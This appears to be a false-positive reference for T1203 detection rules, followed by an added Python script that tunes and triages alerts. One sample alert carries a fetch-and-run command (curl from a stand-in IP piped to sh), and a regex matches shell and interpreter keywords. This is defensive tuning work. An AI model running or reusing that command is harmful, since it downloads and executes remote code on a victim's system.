
t1203

all kinds of software downloads
blocked connection events are generated by an access control policy on the firewall management console, so no false positives should be expected.
exploits that were attempted but unsuccessful.
false positives are directly related to the snort rules that trigger and to the firewall's scoring. if the rules are too noisy, apply additional filters: disable the noisy rules, or ignore the ip ranges that trigger them.
IT admins or developers may legitimately download executables or scripts as part of their normal workflow. apply additional filters accordingly.
it is highly recommended to baseline your activity and tune out common business use cases.
legitimate browser install, update and recovery scripts
legitimate use of scx runasprovider executescript.
legitimate use of scx runasprovider invoke_executeshellcommand.
malicious verdicts could be outdated or incorrect due to retroactive threat intel.
misconfigured applications or automated scripts may generate repeated blocked traffic, particularly if attempting to reach decommissioned or restricted resources. vulnerability scanners or penetration testing tools running in authorized environments may trigger this alert. tuning may be required to exclude known internal tools or scanner ips from detection.
office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com", and may have to be tuned.
scanning attempts with abnormal use of the http post method and no indication of code execution within the http client (request) body. an example would be vulnerability scanners trying to identify unpatched versions without actually exploiting the vulnerability. see the rule description for investigation tips.
unlikely
you may have to tune out certain domains that excel calls out to, such as microsoft domains or other business use case domains.
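Several of the notes above describe the same tuning pattern: exclude authorized scanner IP ranges, allowlist the business domains Office applications legitimately contact, and treat POST requests whose body shows no sign of code execution as probes rather than exploitation. The script below is an added example, not code from LoFP or from any of the rule authors, that applies those three filters to a handful of constructed alerts. The scanner subnets, the domain allowlist, the `CODE_EXEC_RE` heuristic and the alert field names (`src_ip`, `process`, `dest_host`, `method`, `body`) are all assumptions; a real deployment would take them from its own baseline and log schema.

```python
"""Tuning filter for T1203-style client-exploitation alerts (added example).

The alerts, subnets, allowlist and field names below are constructed for
illustration; replace them with your own baseline before use.
"""
import ipaddress
import re

# Assumed authorized scanner ranges (hypothetical RFC 1918 subnets).
AUTHORIZED_SCANNER_NETS = [
    ipaddress.ip_network("10.20.30.0/24"),
    ipaddress.ip_network("192.168.99.0/24"),
]

# Assumed business domains that Excel/Word legitimately call out to.
OFFICE_DOMAIN_ALLOWLIST = ("sharepoint.ourcompany.com", "microsoft.com", "office.com")

# Heuristic markers that a POST body carries something executable rather
# than a bare version probe: shell invocations, interpreter tags, template
# injection syntax, encoded blobs. A heuristic, not a complete signature.
CODE_EXEC_RE = re.compile(
    r"(\$\{|<\?php|\b(?:bash|sh|cmd(?:\.exe)?|powershell)\b|\beval\s*\(|\bsystem\s*\(|/bin/|base64)",
    re.IGNORECASE,
)


def from_authorized_scanner(src_ip: str) -> bool:
    """True when the source address falls inside an authorized scanner range."""
    addr = ipaddress.ip_address(src_ip)
    return any(addr in net for net in AUTHORIZED_SCANNER_NETS)


def office_domain_allowlisted(host: str) -> bool:
    """True when host is, or is a subdomain of, an allowlisted business domain."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in OFFICE_DOMAIN_ALLOWLIST)


def post_body_has_code(body: str) -> bool:
    """True when the request body shows a sign of code execution, not just a probe."""
    return bool(CODE_EXEC_RE.search(body or ""))


def classify(alert: dict) -> str:
    """Return a tuning verdict for one alert.

    Order matters: an authorized scanner source is suppressed first, then
    Office network activity to business domains, then POST-only probes.
    Anything left is escalated for analyst review.
    """
    if alert.get("src_ip") and from_authorized_scanner(alert["src_ip"]):
        return "suppress:authorized-scanner"
    proc = (alert.get("process") or "").lower()
    if proc in ("excel.exe", "winword.exe", "powerpnt.exe") and alert.get("dest_host"):
        if office_domain_allowlisted(alert["dest_host"]):
            return "suppress:office-business-domain"
    if (alert.get("method") or "").upper() == "POST" and not post_body_has_code(alert.get("body") or ""):
        return "suppress:probe-without-payload"
    return "escalate"


def triage(alerts) -> dict:
    """Group alerts by verdict; returns {verdict: [rule names]}."""
    out: dict = {}
    for alert in alerts:
        out.setdefault(classify(alert), []).append(alert["rule"])
    return out


# Constructed alerts covering each tuning case; none are real events.
SAMPLE_ALERTS = [
    {"rule": "snort:exploit-kit-landing", "src_ip": "10.20.30.7", "dst_ip": "10.1.1.5"},
    {"rule": "office:child-network-connection", "process": "EXCEL.EXE",
     "dest_host": "sharepoint.ourcompany.com"},
    {"rule": "http:post-rce-attempt", "src_ip": "203.0.113.9", "method": "POST",
     "body": "q=version&check=1"},
    {"rule": "http:post-rce-attempt", "src_ip": "203.0.113.9", "method": "POST",
     "body": "cmd=bash -c 'curl http://203.0.113.9/x | sh'"},
    {"rule": "office:child-network-connection", "process": "WINWORD.EXE",
     "dest_host": "updates.evil.example"},
]

if __name__ == "__main__":
    for verdict, rules in triage(SAMPLE_ALERTS).items():
        print(f"{verdict:35} {rules}")
```

The domain check matches exact names and subdomains only, so a lookalike such as `sharepoint.ourcompany.com.evil.example` is not allowlisted. Teams that want the investigation tips from the POST-scanning note preserved would typically downgrade the probe verdict to low severity rather than drop it outright; the verdict string is the only thing that needs to change for that.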